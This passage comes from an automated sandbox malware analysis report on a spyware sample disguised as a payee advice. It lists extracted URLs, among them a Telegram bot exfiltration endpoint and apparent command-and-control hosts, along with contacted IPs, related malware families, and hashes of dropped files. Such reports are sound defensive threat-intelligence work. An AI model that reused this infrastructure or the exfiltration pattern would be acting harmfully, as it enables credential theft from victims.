https://fa3hwa.dm.files.1drv.com/y4m_-tS-_uEp2WLW1w2OoZgzsGzku4HExGuSK8wL1Z32RLgaY3iv2hMYfC9YHYGwFGE | 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.office.com/lB | 00000004.00000002.3349133220.0000000037676000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://fa3hwa.dm.files.1drv.com/ | 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp; 00000004.00000003.2783144437.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp; 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp; 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org | 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | PayeeAdvice_HK54912_R0038704_37504.exe (sample file) | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=en | 00000004.00000002.3349133220.000000003764A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://foodex.com.pk | 00000004.00000002.3349133220.0000000037628000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://varders.kozow.com:8081 | 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=enWeb | 00000004.00000002.3349133220.000000003763A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://aborters.duckdns.org:8081 | 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/173.254.250.69$ | 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp; 00000004.00000002.3349133220.0000000037504000.00000004.00000800.00020000.00000000.sdmp; 00000004.00000002.3349133220.0000000037549000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://51.38.247.67:8081/_send_.php?L | 00000004.00000002.3349133220.0000000037605000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://fa3hwa.dm.files.1drv.com/ve | 00000004.00000003.2783144437.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp; 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp; 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://anotherarmy.dns.army:8081 | 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.onedrive.com/v1.0/shares/s | 00000004.00000002.3328690059.0000000006F73000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org/0 | 00000004.00000002.3352963551.0000000039D2E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4 | 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=enlB | 00000004.00000002.3349133220.0000000037645000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org | 00000004.00000002.3349133220.00000000374DA000.00000004.00000800.00020000.00000000.sdmp; 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp; 00000004.00000002.3349133220.0000000037549000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.oned | 00000004.00000002.3328960805.00000000089E0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | 00000004.00000002.3349133220.00000000374DA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
37.27.123.72 | foodex.com.pk | Iran (ISLAMIC Republic Of) | 39232 | UNINETAZ | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1556938
Start date and time: 2024-11-16 16:49:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PayeeAdvice_HK54912_R0038704_37504.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/9@6/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 190
• Number of non-executed functions: 145
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, odc-commonafdrk-geo.onedrive.akadns.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, l-0003.l-msedge.net, ocsp.digicert.com, common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-commonafdrk-brs.onedrive.akadns.net
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
10:51:16 | API Interceptor | 4645x Sleep call for process: PayeeAdvice_HK54912_R0038704_37504.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | download.exe | malicious | Remcos, XWorm |
149.154.167.220 | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | https://t.ly/-kxCO | malicious | Braodo |
149.154.167.220 | dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Lista de cotizaciones.exe | malicious | DarkCloud |
149.154.167.220 | CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | INQ02010391.vbs | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Company Profile_pdf.exe | malicious | GuLoader |
188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
188.114.97.3 | gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/
188.114.97.3 | Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check
188.114.97.3 | View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm | malicious | Unknown | f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
188.114.97.3 | SWIFT 103 202414111523339800 111124.pdf.vbs | malicious | Remcos | paste.ee/d/YU1NN
188.114.97.3 | TT copy.exe | malicious | FormBook | www.lnnn.fun/u5w9/
188.114.97.3 | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/iiEh1iM3/download
188.114.97.3 | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | paste.ee/d/dc8Ru
188.114.97.3 | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | paste.ee/d/LOToW
188.114.97.3 | 8dPlV2lT8o.exe | malicious | Simda Stealer | qegyhig.com/login.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | rSWIFT.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | EKSTRE_1022.exe | malicious | MassLogger RAT | 188.114.97.3
reallyfreegeoip.org | dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
reallyfreegeoip.org | CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
reallyfreegeoip.org | SOF-41593-21052024112851.exe | malicious | MassLogger RAT | 188.114.96.3
reallyfreegeoip.org | PO NO170300999.exe | malicious | MassLogger RAT | 188.114.96.3
checkip.dyndns.com | rSWIFT.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
checkip.dyndns.com | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | EKSTRE_1022.exe | malicious | MassLogger RAT | 193.122.6.168
checkip.dyndns.com | dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
checkip.dyndns.com | CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
checkip.dyndns.com | SOF-41593-21052024112851.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | PO NO170300999.exe | malicious | MassLogger RAT | 132.226.8.169
api.telegram.org | download.exe | malicious | Remcos, XWorm | 149.154.167.220
api.telegram.org | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Lista de cotizaciones.exe | malicious | DarkCloud | 149.154.167.220
api.telegram.org | CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
api.telegram.org | CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
api.telegram.org | INQ02010391.vbs | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Company Profile_pdf.exe | malicious | GuLoader | 149.154.167.220
api.telegram.org | Ziraat#U00a0Bankas#U0131 swift mesaji_html.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | download.exe | malicious | Remcos, XWorm | 149.154.167.220
TELEGRAMRU | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | https://t.ly/-kxCO | malicious | Braodo | 149.154.167.220
TELEGRAMRU | dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Lista de cotizaciones.exe | malicious | DarkCloud | 149.154.167.220
TELEGRAMRU | CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
TELEGRAMRU | CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
TELEGRAMRU | S0FTWARE.exe | malicious | Stealc, Vidar | 149.154.167.99
TELEGRAMRU | INQ02010391.vbs | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENETUS | new.bat | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.174.133
CLOUDFLARENETUS | file.exe | malicious | PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.174.133
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.174.133
CLOUDFLARENETUS | file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.80.55
CLOUDFLARENETUS | file.exe | malicious | NetSupport RAT | 104.26.0.231
CLOUDFLARENETUS | file.exe | malicious | NetSupport RAT | 104.26.0.231
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.174.133
ORACLE-BMC-31898US | rSWIFT.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | botx.mips.elf | malicious | Mirai | 130.61.43.113
ORACLE-BMC-31898US | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | FiddlerSetup.5.0.20245.10105-latest.exe | malicious | PureLog Stealer, zgRAT | 192.29.11.142
ORACLE-BMC-31898US | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | https://bankinter.codix-imx.solutions/iMX/login.jsp | malicious | Unknown | 193.122.9.62
ORACLE-BMC-31898US | EKSTRE_1022.exe | malicious | MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | rSWIFT.exe | malicious | Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Dominion Water & Sanitation District.pdf | malicious | Unknown | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | EKSTRE_1022.exe | malicious | MassLogger RAT | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | SOF-41593-21052024112851.exe | malicious | MassLogger RAT | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | q1M9Xfi0yC.exe | malicious | ScreenConnect Tool | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | iZRt9uAa2V.exe | malicious | ScreenConnect Tool | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | q1M9Xfi0yC.exe | malicious | ScreenConnect Tool | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | iZRt9uAa2V.exe | malicious | ScreenConnect Tool | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | CL714440147.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | TKnBbCiX07.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | ________.exe | malicious | GuLoader, Snake Keylogger
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | Eksistensberettigelsernes102.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | ALI HASSO - P02515 & P02518.exe | malicious | GuLoader, Snake Keylogger
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | PRICE ENQUIRY - RFQ 6000073650.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | PRICE ENQUIRY - RFQ 6000073650.exe | malicious | Azorult, GuLoader
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | Factura Honorarios 2024-10.exe | malicious | GuLoader, Snake Keylogger
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | Shipping documents 00039984849900044800.exe | malicious | AgentTesla, GuLoader

Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11264
Entropy (8bit): 5.801108840712148
Encrypted: false
SSDEEP: 192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
MD5: FC90DFB694D0E17B013D6F818BCE41B0
SHA1: 3243969886D640AF3BFA442728B9F0DFF9D5F5B0
SHA-256: 7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
SHA-512: 324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: CL714440147.exe, Detection: malicious
• Filename: TKnBbCiX07.exe, Detection: malicious
• Filename: ________.exe, Detection: malicious
• Filename: Snurrevoddenes.exe, Detection: malicious
• Filename: Eksistensberettigelsernes102.exe, Detection: malicious
• Filename: ALI HASSO - P02515 & P02518.exe, Detection: malicious
• Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious
• Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious
• Filename: Factura Honorarios 2024-10.exe, Detection: malicious
• Filename: Shipping documents 00039984849900044800.exe, Detection: malicious
Reputation: moderate, very likely benign file
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: data
Category: dropped
Size (bytes): 2186614
Entropy (8bit): 2.907014046366564
Encrypted: false
SSDEEP: 12288:8A/VoYCfp+Lyh5aTuCJh0CvCb/fSQd8rRd:x/CfuK8TuCvvY/6Rf
MD5: 05A9B4BDF262AB8E548A89FB03867E2D
SHA1: A4B181EEDFFB6494CA8A87434F7099CB40BEB667
SHA-256: 6E36D6836D26F33B54DE433BFDD3F732753D7B9A48DE342348C3C06592692D9C
SHA-512: 2C681534E9EBC131DB3BAE12F31CB5232AEAA71A211DB575B6F59C25F12D4EBEB6EB2E6D2C9BAA872083BCB4979074A9FB03B9C7F1F027DC953185B776BC4A16
Malicious: false
Reputation: low
Preview: 8B......,.......,.......D................@.......A..........................................................................................................................................................................................................................................G...J...............h...............................................................g...............................................................j...........................................................................................................................................:...........................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: data
Category: dropped
Size (bytes): 243457
Entropy (8bit): 1.2556862555304324
Encrypted: false
SSDEEP: 768:BObeQfxNU+OmdH9zR+FY73WLYZLbReg24pPjHp5IIHLP96H7ub2g9zEQyhOrqjUC:EfpiYZgCO4zTJJEQ56XsZ3W
MD5: 2C2AECA05F67661A0A6798FD3DA68257
SHA1: 43140C33EE2A2C3B729CFDE53AD2A7E4D2436BBB
SHA-256: 568B8DEE1985CEAFE404B08549F7363DD53A667C7A2BDF80CA8C57BA7ED9FDA0
SHA-512: F833EF465CFDB410BE15E2D647DFFA91C3787D19E6155B7F33F2A3127368A20C35B15442AA9C5FE5953E85DCA80DB843E530705AC22E5A19ABDB604EF85EC81C
Malicious: false
Reputation: low
Preview: ................................K............H.......................................#............,..............................................................................g..........................>...................3..............................P.../......................-................'.........................H...........................................................G...................................................g..................B.....'.....................>....................................v.........................................:.....................................S..............................._.............................................y.......................................E.......i.............................!...........M..X.......................................................{...$..............................g.....[.........................................=.................7..............-...............................................g.......

Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 36028797018963968.000000
Category: dropped
Size (bytes): 370481
Entropy (8bit): 1.2536250775230349
Encrypted: false
SSDEEP: 1536:KsTb+NlXRBRrADr1ILH0FvruLfYOL3u4cF:rCNRRsY0FDSQaQ
MD5: 0D9A1AE53B3662ECA9655EF20BB4E0CE
SHA1: CA647617571F73E4FF815AC7DB91F3FF4BF170A6
SHA-256: 033C22A52C94A106582A33B0C267681B6A4EE7D668E4AA7DA9BD9D0DF05DEA1F
SHA-512: CF89E8EE9AFB4491890D8AF3FE2F7B855C41B68DEE9746155E1E05CC0B91B390D69C0DF905FDE22E9F3580241A57B1A5050903AC32F2695AB5F6485ACB5161E8
Malicious: false
Reputation: low
Preview: ...~........................................x......H..........S..........d............................................................................................................m...............................R.....w...........V.........Z.................b......>........................:..................................................................................................................j..................3..b.....................*.......................P...............................................................#............<.......................................0...a........C......_..........................................................................p..{..........................K.......I.......................E..................&...................................... ............q..........+........................|..................................e.......a..........tQ............I/.........K......................T........................................

Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: ASCII text, with very long lines (401), with CRLF line terminators
Category: dropped
Size (bytes): 403
Entropy (8bit): 4.236334007211441
Encrypted: false
SSDEEP: 12:NRkE9FLJJzKZl6O8oMOvusjy7TVLt09BQiux:N7nLjG8oM6jMp093ux
MD5: F9E44960FAD1DE9A72E38ED010895F2E
SHA1: 56742A285F6AF1D49A3C57941D7562B58601E072
SHA-256: 73F4D5E40CB4BBF5C59C41C8CDDB8F9F7D320470538716B66AA7796EDDB7C6C8
SHA-512: A7642172F96CFA0C3BFDB34FA575C40BD7ECD88C43DD4DF3354AAC3A0F7C6C8709B42AC88838CD5CBB4B3AF32BB48B6A9D1D2EB77C5F55295A88876B271EF1FA
Malicious: false
Reputation: low
Preview: milvago spiralfjedrenes cushier.decine myggesvrmenes deorganization.giannulas poser kloners sammenhfter femoghalvtreds abettals peripatopsidae.tetradic stoppegarner hjemgivelsen masseorganisation lanx,heddinge kricketen symptomer kinas societism avanti tropistic.sarandon mesonyx sangskriveren biblioskopernes tangram zarebas friordningen bygningsingenirs ventilationernes bambusmaattens signatarmagts..

Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: data
Category: dropped
Size (bytes): 425398
Entropy (8bit): 6.9596013459859805
Encrypted: false
SSDEEP: 6144:u0JeAPo+z/VoYCfHvR+npNImyh1kbQ+BMaywuCJhwgm0R:CA/VoYCfp+Lyh5aTuCJh08
MD5: E4876BF05F2F3835F5EF6C35AB8AE670
SHA1: 421353FA201CFFC6BA1EC4B89E7E93D0AC12967D
SHA-256: 4B021B44EC91E049AE37EFE86081DB223FE216F067CA733DB4C0B9C431827E59
SHA-512: 271EDDF295C3C1780376FC62E95A9989225E186E56820471FDDE6954D58D7A47EBA4202BB0B62178AD6EBA43AA422BA2A9627B17DD560AF59A4B30E851372589
Malicious: false
Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: data
Category: dropped
Size (bytes): 486557
Entropy (8bit): 1.2517544244225545
Encrypted: false
SSDEEP: 1536:uRoqTXoly8kLiqpTbJDQAw9WGCEHBg2Ed5:2IkLfpTlDQAOL
MD5: 4F7A0E04C31521449860638552DDC981
SHA1: D6FF38322926347DED812C57690D26DD6BB167A0
SHA-256: 37B7F63261C13F15D9889F297B29273A7B81EB306009F466A0A4383C954F7F49
SHA-512: B5620E786B307EBF3259AE6B5AACD8E2A9B75427DAA88C6CDEBD0D0E62A5ACE6983A131F2B70E35703BEA0E3CEFD4A9B26B7706AEFBECB87F7AFAE0B38740CC9
Malicious: false
Preview: ................P.............................................T....=.........yO.........t..................................W.................................=..................................................................................................................y.........................................................N.....H.................................................................................l.................,..............................]...............:....................................J...}.............................................................................$.........................................=....A....................3.........................................................................7........e...N................#...........................M........................Z....................................................j.................................L........O............................z......,.................c.........3............

Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: data
Category: dropped
Size (bytes): 207254
Entropy (8bit): 1.2604686518033184
Encrypted: false
SSDEEP: 768:od51waTQFApCdHNsdUp09xiXes7NAnAC+qFvVdhVMtdubYN/UIC6mTtRzcScEfQt:hA6C9AG+alAKUcyZ9oE
MD5: 43A8D782AD3A56D7ECD14E52CAEA0F41
SHA1: FCDFF92EC42BEDC2297AE1ECB3C8A009E9A900BF
SHA-256: 06AB90D835D1CCFF3CFD1AE37956891918190037D989B4072B4E7ABD5B5418C6
SHA-512: 6EEBAC37056096ED7C0C97EA44A4FEDB7DD54DF826171F5733FF72AE0943C6D156F66CCD8239866180AF8FC7793480EDCCACE317BE58F37BEFB12CA43A390871
Malicious: false
